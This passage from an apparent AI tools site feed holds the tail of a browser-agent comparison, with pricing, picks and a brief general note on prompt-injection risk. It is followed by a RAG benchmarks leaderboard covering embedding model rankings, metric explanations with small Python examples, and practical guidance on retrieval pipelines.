          <td>Medium-High</td>
          <td>Shopping, booking, forms</td>
          <td>Client-side processing</td>
          <td>$19.90/month</td>
          <td>Win, Mac, Linux</td>
      </tr>
      <tr>
          <td>Chrome + Gemini</td>
          <td>Medium</td>
          <td>Forms, scheduling, commerce</td>
          <td>Google cloud</td>
          <td>$19.99 AI Pro</td>
          <td>Win, Mac, Chromebook</td>
      </tr>
      <tr>
          <td>Brave Leo</td>
          <td>Medium (Nightly)</td>
          <td>Research, shopping, forms</td>
          <td>No-log, TEE, local option</td>
          <td>Free / $14.99</td>
          <td>All platforms</td>
      </tr>
      <tr>
          <td>Fellou</td>
          <td>High</td>
          <td>Deep research, multi-site tasks</td>
          <td>Local unless cloud chosen</td>
          <td>Free (4 tasks) / $20</td>
          <td>Mac (Win coming)</td>
      </tr>
      <tr>
          <td>Edge Copilot</td>
          <td>Medium-High</td>
          <td>Multi-tab, forms, workflows</td>
          <td>Microsoft cloud + DLP</td>
          <td>M365 included</td>
          <td>Win, Mac, mobile</td>
      </tr>
      <tr>
          <td>Island</td>
          <td>Enterprise</td>
          <td>Governed agents, audit trails</td>
          <td>Enterprise hardened</td>
          <td>Custom pricing</td>
          <td>Win, Mac</td>
      </tr>
  </tbody>
</table>
<hr>
<h2 id="which-browser-agent-to-pick">Which Browser Agent to Pick</h2>
<p><strong>You want the most capable agent and price isn't the constraint:</strong> Perplexity Comet Max at $200/month, with Claude Opus 4.6 for complex tasks. Keep an eye on the security advisories.</p>
<p><strong>You want a capable agent at $20/month:</strong> Comet Pro, Dia Pro, Opera Neon, and Fellou Plus are all competitive. Comet has deeper agentic task completion; Dia has better knowledge-work integrations (Slack, Notion, Google Calendar); Opera Neon has better client-side privacy.</p>
<p><strong>Privacy is the primary requirement:</strong> Brave with AI Browsing. No IP logging, TEE-verified privacy guarantees, and a local inference option via Ollama. The AI Browsing feature is still in Nightly as of April 2026, so early-adopter roughness applies.</p>
<p><strong>You're already on Google AI Pro:</strong> Chrome's Auto Browse at 20 tasks/day is included and works well for Google-ecosystem workflows and UCP-supported commerce sites. Don't pay again for a separate browser.</p>
<p><strong>You're in an enterprise environment with compliance requirements:</strong> Island Browser for hardened, audited agents. Edge Copilot Mode if you're on Microsoft 365 and governance integration matters more than advanced agent capability.</p>
<p><strong>You want to build your own agent, not just use one:</strong> Surfer-H and Browserbase/Stagehand are the places to start. See <a href="/tools/best-ai-browser-automation-tools-2026/">our browser automation roundup</a> for the full developer-side picture.</p>
<div class="pull-quote">
<p>The consumer browser agent market converged on $20/month in late 2025. Differentiation now comes down to privacy model, task depth, and ecosystem integrations - not price.</p>
</div>
<hr>
<h2 id="the-security-reality">The Security Reality</h2>
<p>None of the vendors discuss this prominently in their marketing, but it's the practical issue that matters most for any agentic browser: every piece of web content the agent processes is a potential prompt injection surface.</p>
<p>Comet's six vulnerabilities aren't a Comet problem - they're a demonstration of the category problem. OpenAI has <a href="https://techcrunch.com/2025/12/22/openai-says-ai-browsers-may-always-be-vulnerable-to-prompt-injection-attacks/">acknowledged</a> that prompt injection in its own Atlas browser agent is &quot;unlikely to ever be completely eliminated.&quot; The architectural issue is that LLMs can't reliably distinguish between trusted user instructions and untrusted page content when they arrive in the same token stream.</p>
<p>Practical mitigations: keep password managers locked when not in active use, disable agent access to sensitive domains in browser settings, and treat your agent's access scope as your attack surface. A browser agent with access to your email and calendar has a larger blast radius than a sandboxed chatbot. Scope it accordingly.</p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://www.eesel.ai/blog/perplexity-comet-pricing">Perplexity Comet pricing guide - eesel AI</a></li>
<li><a href="https://www.finout.io/blog/perplexity-pricing-in-2026">Perplexity pricing plans - finout.io</a></li>
<li><a href="https://9to5mac.com/2026/03/18/perplexity-brings-ai-comet-browser-to-iphone/">Comet arrives on iPhone - 9to5Mac</a></li>
<li><a href="https://www.diabrowser.com/">Dia browser official site</a></li>
<li><a href="https://techcrunch.com/2025/06/11/the-browser-company-launches-its-ai-first-browser-dia-in-beta/">The Browser Company launches Dia in beta - TechCrunch</a></li>
<li><a href="https://www.atlassian.com/blog/announcements/atlassian-acquires-the-browser-company">Atlassian acquires The Browser Company - Atlassian blog</a></li>
<li><a href="https://blogs.opera.com/news/2025/09/opera-neon-agentic-ai-browser-release/">Opera Neon ships - Opera blog</a></li>
<li><a href="https://techcrunch.com/2025/12/11/opera-wants-you-to-pay-20-a-month-to-use-its-ai-powered-browser-neon/">Opera Neon $19.90 subscription - TechCrunch</a></li>
<li><a href="https://press.opera.com/2025/03/03/opera-browser-operator-ai-agentics/">Opera Browser Operator announcement - Opera Newsroom</a></li>
<li><a href="https://techcrunch.com/2026/01/28/chrome-takes-on-ai-browsers-with-tighter-gemini-integration-agentic-features-for-autonomous-tasks/">Chrome Gemini agentic features - TechCrunch</a></li>
<li><a href="https://gemini.google/subscriptions/">Google AI Pro and Ultra pricing - gemini.google</a></li>
<li><a href="https://brave.com/leo/">Brave Leo official page</a></li>
<li><a href="https://brave.com/blog/ai-browsing/">Brave AI Browsing announcement</a></li>
<li><a href="https://brave.com/blog/browser-ai-tee/">Brave TEE privacy announcement</a></li>
<li><a href="https://fellou.ai/pricing">Fellou official pricing</a></li>
<li><a href="https://seraphicsecurity.com/learn/ai-browser/fellou-browser-agentic-features-pros-cons-and-security-concerns/">Fellou browser agentic features and security - Seraphic Security</a></li>
<li><a href="https://siliconangle.com/2025/07/28/microsoft-turns-edge-ai-agent-new-copilot-mode/">Edge Copilot Mode enterprise-ready - SiliconANGLE</a></li>
<li><a href="https://www.island.io/press/island-makes-ai-work-for-the-enterprise">Island enterprise AI platform - island.io</a></li>
<li><a href="https://hcompany.ai/surfer-2">Surfer 2 by H Company</a></li>
<li><a href="https://en.wikipedia.org/wiki/Dia_(web_browser)">Dia browser - Wikipedia</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-browser-agents-2026_hu_a005a4c7f41314b3.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-browser-agents-2026_hu_a005a4c7f41314b3.jpg" width="1200" height="675"/></item><item><title>RAG Benchmarks Leaderboard: Retrieval Rankings 2026</title><link>https://awesomeagents.ai/leaderboards/rag-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 13:23:27 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/rag-benchmarks-leaderboard/</guid><description>&lt;p>Retrieval-augmented generation has become the default architecture for anything that needs to answer questions from a document corpus without hallucinating facts. If you're new to the concept, our &lt;a href="/guides/what-is-rag/">RAG explainer guide&lt;/a> covers the basics. The benchmark ecosystem around it has matured in parallel: today there are distinct evaluation tracks for retrieval quality, multilingual coverage, multi-hop reasoning, and end-to-end faithfulness. This leaderboard covers all of them.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Retrieval-augmented generation has become the default architecture for anything that needs to answer questions from a document corpus without hallucinating facts. If you're new to the concept, our <a href="/guides/what-is-rag/">RAG explainer guide</a> covers the basics. The benchmark ecosystem around it has matured in parallel: today there are distinct evaluation tracks for retrieval quality, multilingual coverage, multi-hop reasoning, and end-to-end faithfulness. This leaderboard covers all of them.</p>
<p>Two things make RAG benchmarking unusual compared to language modeling leaderboards. First, you're assessing two different components - the embedding or retrieval model, and the generation model that reads what was retrieved. A great retriever paired with a weak generator will still hallucinate. Second, scores mean different things across benchmarks. An NDCG@10 score on BEIR isn't the same animal as an Exact Match score on NQ, and comparing them directly misleads more than it informs.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Gemini Embedding 2 leads the MTEB retrieval track with a 68.32 average and 67.71 on retrieval tasks specifically - the widest margin Google has held on this leaderboard</li>
<li>Voyage-4-large, released in January 2026 with a Mixture-of-Experts architecture, beats OpenAI text-embedding-3-large by 14% on NDCG@10 across 29 retrieval domains</li>
<li>For hallucination in RAG generation, GPT-4o and Claude 3.5 Sonnet remain the best commercial options - fine-tuned open models on RAGTruth data can approach that quality at much lower cost</li>
</ul>
</div>
<h2 id="what-each-benchmark-measures">What Each Benchmark Measures</h2>
<p>RAG evaluation splits cleanly into retrieval benchmarks and end-to-end RAG benchmarks. They test different failure modes.</p>
<p><strong>Retrieval benchmarks</strong> score how well a model finds the right documents given a query. The dominant metric is NDCG@10 (normalized discounted cumulative gain at rank 10), which rewards returning relevant documents at the top of the ranking and penalizes burying them lower down. Most retrieval benchmarks are zero-shot by design - models shouldn't be trained on the evaluation data.</p>
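<p>For readers who want the metric made concrete, here's a minimal sketch of how NDCG@10 can be computed from graded relevance labels. It uses the linear-gain formulation; some evaluation harnesses use an exponential gain instead, so treat it as illustrative rather than as the exact BEIR/MTEB scoring code.</p>
<pre><code class="language-python"># NDCG@10 from graded relevance labels, using the linear-gain formulation.
# ranked_rels: relevance of the returned documents, in the model's order;
# all_rels: the same labels for every judged document (builds the ideal ranking).
import math

def dcg(rels, k=10):
    return sum(rel / math.log2(i + 2) for i, rel in enumerate(rels[:k]))

def ndcg_at_10(ranked_rels, all_rels):
    ideal = dcg(sorted(all_rels, reverse=True))
    return dcg(ranked_rels) / ideal if ideal else 0.0

# Burying the only highly relevant document at rank 3 costs roughly half the score:
print(round(ndcg_at_10([0, 0, 3, 1], [3, 1, 0, 0]), 2))  # about 0.53
</code></pre>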
<p><strong>End-to-end RAG benchmarks</strong> score the full pipeline: does the produced answer actually match the gold answer, and does it stick to what was retrieved? The key metrics here are Exact Match (EM), F1, and faithfulness scores. A model that scores well on retrieval but has high hallucination rates on RAGTruth has a generation problem, not a retrieval problem.</p>
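<p>The answer-side metrics are just as easy to sketch. The snippet below shows simplified Exact Match and token-level F1; the official evaluation scripts also strip punctuation and articles during normalization, which this version skips.</p>
<pre><code class="language-python"># Simplified Exact Match and token-level F1 for QA answers. Official scripts
# also strip punctuation and drop articles; this version only lowercases and
# collapses whitespace.
def normalize(text):
    return " ".join(text.lower().split())

def exact_match(prediction, gold):
    return float(normalize(prediction) == normalize(gold))

def f1(prediction, gold):
    pred = normalize(prediction).split()
    ref = normalize(gold).split()
    overlap = sum(min(pred.count(t), ref.count(t)) for t in set(pred))
    if overlap == 0:
        return 0.0
    precision = overlap / len(pred)
    recall = overlap / len(ref)
    return 2 * precision * recall / (precision + recall)

print(exact_match("the Eiffel Tower", "Eiffel Tower"))   # 0.0 - EM is strict
print(round(f1("the Eiffel Tower", "Eiffel Tower"), 2))  # 0.8
</code></pre>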
<h3 id="beir---the-generalization-test">BEIR - The Generalization Test</h3>
<p>BEIR (Benchmarking Information Retrieval) covers 18 diverse datasets including MS MARCO, Natural Questions, HotpotQA, and domain-specific corpora spanning biomedical, legal, scientific, and technical content. The benchmark is intentionally heterogeneous - a model that scores well here generalizes to out-of-distribution queries, which is what you actually want in production. BM25 scores around 42 NDCG@10 as the sparse baseline; modern dense models consistently clear 60.</p>
<h3 id="mteb-retrieval-track">MTEB Retrieval Track</h3>
<p>The Massive Text Embedding Benchmark includes a 15-dataset retrieval sub-track that overlaps with BEIR. MTEB is more structured about evaluation conditions and covers additional task categories (STS, classification, clustering) that let you see how retrieval performance relates to other embedding capabilities. It's the most widely used comparative leaderboard for embedding models.</p>
<h3 id="miracl---multilingual-retrieval">MIRACL - Multilingual Retrieval</h3>
<p>MIRACL covers 18 languages with native-speaker annotation for each, testing monolingual retrieval where both queries and documents are in the same language. The dataset spans languages from Arabic and Bengali to Swahili and Telugu. A model that scores well on English MTEB can still fall apart here - many commercial APIs drop 20-30% in retrieval quality when switching from English to lower-resource languages. The evaluation metrics are nDCG@10 and Recall@100.</p>
<p>In May 2025, MIRACL-VISION extended the benchmark to visual document retrieval across the same 18 languages, exposing a different problem: state-of-the-art VLM embedding models lag text-based retrieval models by up to 59.7% in multilingual visual retrieval accuracy.</p>
<h3 id="ms-marco---large-scale-passage-ranking">MS MARCO - Large-Scale Passage Ranking</h3>
<p>MS MARCO is a large-scale dataset from real Bing queries and human-annotated passage relevance. The passage ranking task uses MRR@10 as the primary metric. Unlike BEIR, which tests generalization, MS MARCO is the closest thing to an in-distribution retrieval test for English web queries. Models optimized for MS MARCO tend to excel here but don't always transfer to domain-specific corpora.</p>
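<p>MRR@10 is the simplest of these metrics to compute: the reciprocal rank of the first relevant passage, averaged over queries, with anything outside the top 10 scoring zero. A minimal sketch:</p>
<pre><code class="language-python"># MRR@10: mean of 1/rank of the first relevant passage, counting only the
# top 10 results and scoring 0 when no relevant passage appears there.
def mrr_at_10(rankings_relevance):
    """rankings_relevance: one list of 0/1 relevance flags per query, ranked best-first."""
    total = 0.0
    for flags in rankings_relevance:
        for rank, is_relevant in enumerate(flags[:10], start=1):
            if is_relevant:
                total += 1.0 / rank
                break
    return total / len(rankings_relevance)

# First query hits at rank 2, second at rank 1, third misses the top 10 entirely:
print(round(mrr_at_10([[0, 1, 0], [1, 0, 0], [0, 0, 0]]), 3))  # 0.5
</code></pre>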
<h3 id="kilt---knowledge-intensive-tasks">KILT - Knowledge-Intensive Tasks</h3>
<p>KILT (Knowledge Intensive Language Tasks, from Meta AI) tests retrieval over a Wikipedia snapshot for 11 downstream tasks: fact-checking, open-domain QA, slot filling, entity linking, and dialogue. Systems need to retrieve supporting evidence and generate answers grounded in that evidence. CoRAG-8B, released in January 2025, currently holds state-of-the-art scores across most KILT tasks, outperforming systems built on much larger LLMs.</p>
<h3 id="hotpotqa-and-natural-questions">HotpotQA and Natural Questions</h3>
<p>These are multi-hop and open-domain QA benchmarks, respectively. HotpotQA requires retrieving evidence from multiple documents and connecting it to answer questions that can't be answered from any single passage. NQ uses real Google search queries against Wikipedia. EM (Exact Match) and F1 are the standard metrics, and scores here reflect the combined quality of both retrieval and generation.</p>
<h3 id="ragtruth---hallucination-in-generation">RAGTruth - Hallucination in Generation</h3>
<p>RAGTruth is a corpus of nearly 18,000 RAG responses from multiple LLMs, annotated at the word level for hallucination type and severity. It's the most detailed benchmark specifically for the generation side of RAG - distinguishing between cases where the model invented unsupported facts, contradicted the retrieved context, or produced partially correct but misleading answers. The benchmark was introduced at ACL 2024 and has become the standard reference for comparing how different LLMs handle retrieved context faithfully.</p>
<p><img src="/images/leaderboards/rag-benchmarks-leaderboard-retrieval.jpg" alt="Retrieval quality varies significantly across document types, languages, and query styles">
<em>Retrieval benchmarks like BEIR test generalization across domains - medical, legal, code, and web queries each expose different model weaknesses.</em>
<small>Source: unsplash.com</small></p>
<h2 id="retrieval-model-rankings">Retrieval Model Rankings</h2>
<h3 id="mteb-retrieval--beir-leaders">MTEB Retrieval + BEIR Leaders</h3>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>MTEB Retrieval (nDCG@10)</th>
          <th>BEIR Avg (nDCG@10)</th>
          <th>Type</th>
          <th>Pricing</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini Embedding 2</td>
          <td>Google</td>
          <td>67.71</td>
          <td>~67.7</td>
          <td>API</td>
          <td>$0.20/M tokens ($0.10 batch)</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Voyage-4-large</td>
          <td>Voyage AI</td>
          <td>~66.0</td>
          <td>~66.0</td>
          <td>API</td>
          <td>200M free; paid tier</td>
      </tr>
      <tr>
          <td>3</td>
          <td>NV-Embed-v2</td>
          <td>NVIDIA</td>
          <td>62.65</td>
          <td>59.36</td>
          <td>Open-weight</td>
          <td>Free</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Qwen3-Embedding-8B</td>
          <td>Alibaba</td>
          <td>~62.0</td>
          <td>~62.0</td>
          <td>Open-weight</td>
          <td>Free</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Cohere Embed v4</td>
          <td>Cohere</td>
          <td>~61.0</td>
          <td>~61.0</td>
          <td>API</td>
          <td>$0.12/M tokens</td>
      </tr>
      <tr>
          <td>6</td>
          <td>OpenAI text-embedding-3-large</td>
          <td>OpenAI</td>
          <td>~59.0</td>
          <td>~59.0</td>
          <td>API</td>
          <td>$0.13/M tokens</td>
      </tr>
      <tr>
          <td>7</td>
          <td>BGE-M3</td>
          <td>BAAI</td>
          <td>~58.0</td>
          <td>~58.0</td>
          <td>Open-weight</td>
          <td>Free</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Voyage-3.5</td>
          <td>Voyage AI</td>
          <td>~57.5</td>
          <td>~57.5</td>
          <td>API</td>
          <td>200M free; paid tier</td>
      </tr>
      <tr>
          <td>9</td>
          <td>GTE-ModernBERT-base</td>
          <td>Alibaba/Community</td>
          <td>64.38*</td>
          <td>-</td>
          <td>Open-weight</td>
          <td>Free</td>
      </tr>
      <tr>
          <td>10</td>
          <td>BM25</td>
          <td>-</td>
          <td>~42.0</td>
          <td>~42.0</td>
          <td>Sparse baseline</td>
          <td>Free</td>
      </tr>
  </tbody>
</table>
<p>*GTE-ModernBERT-base score is on the full MTEB English average (not retrieval-only), using 149M parameters. It's included as the strongest efficient open-weight option under 150M parameters.</p>
<p>A few caveats on this table. Voyage AI publishes scores on their own RTEB benchmark (29 datasets across 8 domains) rather than MTEB, which makes direct comparison to MTEB scores approximate. On their own evaluation, voyage-4-large beats OpenAI text-embedding-3-large by 14% and Cohere Embed v4 by 8.2% in NDCG@10. MTEB is cross-vendor but self-reported; RTEB is vendor-controlled but more thorough. Neither is fully neutral.</p>
<h3 id="miracl-multilingual-rankings">MIRACL Multilingual Rankings</h3>
<p>For multilingual retrieval, the picture looks different:</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Reported multilingual score</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>NVIDIA Llama-Embed-Nemotron-8B</td>
          <td>-</td>
          <td>Best open-weight multilingual; tops MMTEB across 250+ languages</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3-Embedding-8B</td>
          <td>~70.58 (MMTEB avg)</td>
          <td>Strong on East Asian languages</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Cohere Embed v4</td>
          <td>Strong</td>
          <td>100+ languages; cross-lingual retrieval</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Gemini Embedding 2</td>
          <td>Strong</td>
          <td>Multimodal; weaker on low-resource</td>
      </tr>
      <tr>
          <td>5</td>
          <td>BGE-M3</td>
          <td>~63.0</td>
          <td>BAAI multilingual model</td>
      </tr>
  </tbody>
</table>
<p>For production multilingual work, the best free option is NVIDIA Llama-Embed-Nemotron-8B. If you need a commercial API with broad language support, Cohere Embed v4 covers 100+ languages with cross-lingual retrieval (query in English, retrieve in French, etc.) and is the only major embedding API that also handles images natively.</p>
<h2 id="end-to-end-rag-generation-quality">End-to-End RAG: Generation Quality</h2>
<p>The generation side of RAG gets less systematic attention than retrieval, but RAGTruth and KILT give us data points.</p>
<p>On the RAGTruth hallucination benchmark, LLM performance varies enough to matter in production. GPT-4o and Claude 3.5 Sonnet produce the fewest hallucinations against retrieved context. Fine-tuned smaller models trained on RAGTruth data can reach competitive faithfulness at lower cost - the original paper showed that fine-tuning Llama-2-13B on RAGTruth training data matched prompt-based approaches with GPT-4. That gap has closed further with stronger base models in 2025-2026.</p>
<p>On KILT, CoRAG-8B (Chain-of-Retrieval Augmented Generation, January 2025) posts state-of-the-art performance on multi-hop QA tasks including HotpotQA subsets, beating systems built on LLMs three to five times larger. CoRAG uses iterative retrieval - the model retrieves, reads, decides if it needs more evidence, and retrieves again. Single-pass RAG struggles with multi-hop questions by design.</p>
<p><img src="/images/leaderboards/rag-benchmarks-leaderboard-scoring.jpg" alt="Scoring dimensions for RAG system evaluation: retrieval quality, faithfulness, and answer accuracy">
<em>End-to-end RAG evaluation requires tracking retrieval quality and generation faithfulness separately - strong retrieval with weak generation still produces hallucinated answers.</em>
<small>Source: unsplash.com</small></p>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="gemini-embedding-2-sets-a-new-bar">Gemini Embedding 2 Sets a New Bar</h3>
<p>Google released Gemini Embedding 2 into public preview in March 2026. It's built natively on the Gemini architecture and handles text, images, video, audio, and PDFs in a single 3,072-dimensional vector space. On MTEB English, it scores 68.32 overall and 67.71 on the retrieval sub-track, with Matryoshka support down to 768 dimensions.</p>
<p>The pricing is $0.20 per million tokens standard or $0.10 with batch processing. Indexing 1 million 500-token documents costs roughly $50 at batch rates. That's not cheap compared to open-weight models, but it's clearly less than the engineering cost of self-hosting a competitive open model. Early production reports mention 20% recall improvement and 70% latency reduction from users switching from older models - though those come from Google's own case studies, so treat them as directional.</p>
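<p>The arithmetic behind that figure is straightforward - a quick sanity check, assuming the same corpus size and average document length quoted above:</p>
<pre><code class="language-python"># Sanity check on the indexing cost quoted above (assumed corpus shape:
# 1M documents averaging 500 tokens each, at the $0.10/M-token batch rate).
docs = 1_000_000
tokens_per_doc = 500
batch_rate_per_million_tokens = 0.10  # USD
total_tokens = docs * tokens_per_doc
cost = total_tokens / 1_000_000 * batch_rate_per_million_tokens
print(f"{total_tokens:,} tokens, about ${cost:,.0f}")  # 500,000,000 tokens, about $50
</code></pre>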
<p>The main limitation is vendor lock-in. Re-indexing a document corpus whenever you switch embedding models is a real operational burden. If you build on Gemini Embedding 2, plan for it long-term or architect an abstraction layer.</p>
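<p>What that abstraction layer looks like is mostly a matter of taste, but the shape is simple: put a thin interface between the pipeline and the vendor SDK so a model switch only touches one adapter. A minimal sketch, with hypothetical class and method names (not any vendor's actual client):</p>
<pre><code class="language-python"># A minimal sketch of an embedding abstraction layer. Class and method names
# here are hypothetical, not any vendor's SDK; the point is that the rest of
# the pipeline depends only on the small Embedder interface.
from typing import Protocol

class Embedder(Protocol):
    def embed(self, texts):
        """Return one vector (a list of floats) per input text."""
        ...

class GeminiEmbedder:
    """Placeholder adapter - wire the real Gemini Embedding 2 client in here."""
    def embed(self, texts):
        raise NotImplementedError

class LocalEmbedder:
    """Placeholder adapter for a self-hosted model such as NV-Embed-v2."""
    def embed(self, texts):
        raise NotImplementedError

def index_corpus(embedder, documents, store):
    # `store` is any vector store exposing an upsert(doc_id, vector) method.
    # Swapping providers means swapping the adapter - and re-embedding the corpus.
    for doc_id, text in documents:
        store.upsert(doc_id, embedder.embed([text])[0])
</code></pre>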
<h3 id="the-moe-architecture-arrives-for-embeddings">The MoE Architecture Arrives for Embeddings</h3>
<p>Voyage-4-large, launched in January 2026, is the first production embedding model using a Mixture-of-Experts architecture. The MoE design routes different inputs to specialized sub-networks, delivering &quot;serving costs 40% lower than comparable dense models&quot; according to Voyage AI, while maintaining state-of-the-art accuracy. The model family includes voyage-4, voyage-4-lite, and voyage-4-nano (open-weight, Apache 2.0 on Hugging Face).</p>
<p>Voyage AI uses their own RTEB benchmark for evaluation rather than MTEB, which creates comparison friction. On RTEB, voyage-4-large outperforms Gemini Embedding 001 by 3.87% and OpenAI text-embedding-3-large by 14.05% in NDCG@10 across 29 datasets. Independent third-party scoring on MTEB puts the comparison closer, but Voyage models consistently sit in the top tier.</p>
<h3 id="open-weight-models-are-genuinely-competitive">Open-Weight Models Are Genuinely Competitive</h3>
<p>NVIDIA's NV-Embed-v2 posts 62.65 on the MTEB retrieval track - trailing Gemini Embedding 2's 67.71, but scoring higher than OpenAI text-embedding-3-large on retrieval specifically. NV-Embed-v2 reached 72.31 on the full MTEB average (56 tasks) using a two-stage contrastive instruction-tuning method. It's fully open-weight and runs on a single A100. For teams with GPU infrastructure already in place, self-hosting NV-Embed-v2 eliminates per-token costs completely.</p>
<p>Qwen3-Embedding-8B, Alibaba's multilingual model, scores 70.58 on the MMTEB multilingual leaderboard and supports flexible dimensions from 32 to 4096. Its code retrieval score on MTEB Code is 80.68, the highest reported for any model on that sub-benchmark. If your RAG system needs to retrieve code with natural language documentation, Qwen3-Embedding-8B is the current choice.</p>
<p>Our <a href="/leaderboards/embedding-model-leaderboard-mteb-march-2026/">embedding model leaderboard from March 2026</a> covers the full MTEB picture in more depth, including dimension tradeoffs and Matryoshka support across providers.</p>
<h3 id="bm25-is-still-alive-but-in-a-support-role">BM25 Is Still Alive, But in a Support Role</h3>
<p>Sparse retrieval with BM25 scores around 42 NDCG@10 on BEIR - below every modern dense model. But that doesn't mean BM25 is obsolete. Hybrid search combining BM25 with dense retrieval routinely beats either method alone, particularly on exact-match queries like product codes, person names, and technical identifiers. Dense models miss these because the learned vector space doesn't encode character-level patterns reliably. Most production RAG systems should use hybrid retrieval unless they have clear evidence that pure dense retrieval meets their precision requirements.</p>
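<p>One common way to implement that hybrid combination is reciprocal rank fusion, which merges the two ranked lists without having to calibrate their score scales against each other. A minimal sketch, assuming <code>bm25_search</code> and <code>dense_search</code> helpers that return document IDs ordered best-first:</p>
<pre><code class="language-python"># Reciprocal rank fusion over a BM25 ranking and a dense ranking. bm25_search
# and dense_search are assumed helpers returning document IDs, best first.
def reciprocal_rank_fusion(rankings, k=60):
    """Merge ranked lists; k=60 is the constant most implementations default to."""
    scores = {}
    for ranking in rankings:
        for rank, doc_id in enumerate(ranking, start=1):
            scores[doc_id] = scores.get(doc_id, 0.0) + 1.0 / (k + rank)
    return sorted(scores, key=scores.get, reverse=True)

def hybrid_search(query, top_k=10):
    sparse = bm25_search(query, top_k=100)  # keyword precision: codes, names, IDs
    dense = dense_search(query, top_k=100)  # semantic recall: paraphrases, synonyms
    return reciprocal_rank_fusion([sparse, dense])[:top_k]
</code></pre>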
<h3 id="multi-hop-rag-requires-a-different-stack">Multi-Hop RAG Requires a Different Stack</h3>
<p>Standard single-pass RAG - retrieve once, produce once - handles simple factoid questions reasonably well. It struggles with questions requiring evidence from multiple documents, temporal reasoning, or comparative analysis. On HotpotQA specifically, hybrid retrieval combining dense and lexical signals with maximum marginal relevance post-filtering achieves 20% absolute EM improvement over pure dense retrieval alone.</p>
<p>CoRAG-8B's iterative retrieve-read-decide-retrieve loop is the cleanest solution for multi-hop at inference time. It requires more compute per query (5-8 retrieval passes for hard questions), but the accuracy gains are significant. For production systems handling complex enterprise queries, iterative retrieval is worth the latency cost.</p>
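<p>The retrieve-read-decide loop is easy to sketch in plain Python. This illustrates the pattern, not CoRAG's actual implementation; <code>retrieve()</code> and <code>llm()</code> are assumed helpers that return passages and model text respectively.</p>
<pre><code class="language-python"># Sketch of an iterative retrieve-read-decide loop (in the spirit of CoRAG,
# not its actual code). retrieve() and llm() are assumed helpers.
def iterative_rag(question, max_passes=8):
    evidence = []
    query = question
    for _ in range(max_passes):
        evidence.extend(retrieve(query, top_k=5))
        decision = llm(
            "Given this evidence, answer the question, or reply with "
            "MORE: followed by a follow-up search query.\n\n"
            f"Question: {question}\nEvidence: {evidence}"
        )
        if decision.startswith("MORE:"):
            query = decision.removeprefix("MORE:").strip()  # hop again
        else:
            return decision  # the model judged the evidence sufficient
    # Fall back to answering with whatever evidence was gathered.
    return llm(f"Answer as best you can.\nQuestion: {question}\nEvidence: {evidence}")
</code></pre>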
<h3 id="ragperf-brings-system-level-measurement">RAGPerf Brings System-Level Measurement</h3>
<p>Most RAG benchmarks measure either retrieval quality or answer quality in isolation. RAGPerf, released on arXiv in March 2026, provides an end-to-end framework that simultaneously tracks context recall, query accuracy, factual consistency, latency, throughput, and GPU/memory use across a full pipeline. It supports multiple vector databases (LanceDB, Milvus, Qdrant, Chroma, Elasticsearch) and is open-sourced at <code>platformxlab/RAGPerf</code>. For teams building production systems, this is the first framework that lets you see retrieval accuracy tradeoffs against actual hardware costs in a single run.</p>
<h2 id="practical-guidance">Practical Guidance</h2>
<p>The right choice depends on which part of the pipeline you're improving.</p>
<p><strong>For best retrieval accuracy (API):</strong> Gemini Embedding 2 leads on MTEB retrieval at 67.71 NDCG@10. If you don't want Google lock-in, voyage-4-large is the alternative, with strong RTEB numbers and a lower-cost MoE architecture.</p>
<p><strong>For best retrieval accuracy (self-hosted):</strong> NV-Embed-v2 scores 62.65 on MTEB retrieval and is fully open-weight. Qwen3-Embedding-8B is preferred for multilingual or code-heavy workloads.</p>
<p><strong>For multilingual RAG:</strong> NVIDIA Llama-Embed-Nemotron-8B leads the MMTEB multilingual benchmark and is open-weight. For a commercial API, Cohere Embed v4 covers 100+ languages with cross-lingual support and multimodal capability.</p>
<p><strong>For budget-constrained pipelines:</strong> OpenAI text-embedding-3-small at $0.02/million tokens offers a reasonable retrieval score for the price. Voyage-4-nano is Apache 2.0 licensed, freely deployable, and designed for high-throughput low-cost retrieval.</p>
<p><strong>For multi-hop or complex queries:</strong> Single-pass RAG won't cut it. Build iterative retrieval into your pipeline. CoRAG-8B's approach is the current benchmark reference.</p>
<p><strong>For minimizing hallucination:</strong> Choose your generation model carefully. On RAGTruth evaluations, GPT-4o and Claude 3.5 Sonnet produce the fewest hallucinations when given retrieved context. Fine-tuning a smaller model on RAGTruth-style data is a viable lower-cost path. See our <a href="/tools/best-ai-rag-tools-2026/">guide to best RAG tools in 2026</a> for framework-level options including LangChain, LlamaIndex, and Haystack.</p>
<p><strong>What benchmark to trust:</strong> For retrieval comparison, use MTEB as the cross-vendor neutral standard. Be skeptical of vendor-internal benchmarks (including Voyage's RTEB) when they're the only numbers cited. For end-to-end faithfulness, RAGTruth is the most granular public reference. For multilingual, MIRACL and MMTEB are the appropriate benchmarks - English MTEB scores don't predict multilingual performance reliably.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-embedding-model-is-best-for-rag-in-2026">Which embedding model is best for RAG in 2026?</h3>
<p>Gemini Embedding 2 leads on MTEB retrieval with 67.71 NDCG@10. For self-hosted options, NV-Embed-v2 and Qwen3-Embedding-8B are both competitive. For multilingual, NVIDIA Llama-Embed-Nemotron-8B leads.</p>
<h3 id="what-is-the-beir-benchmark">What is the BEIR benchmark?</h3>
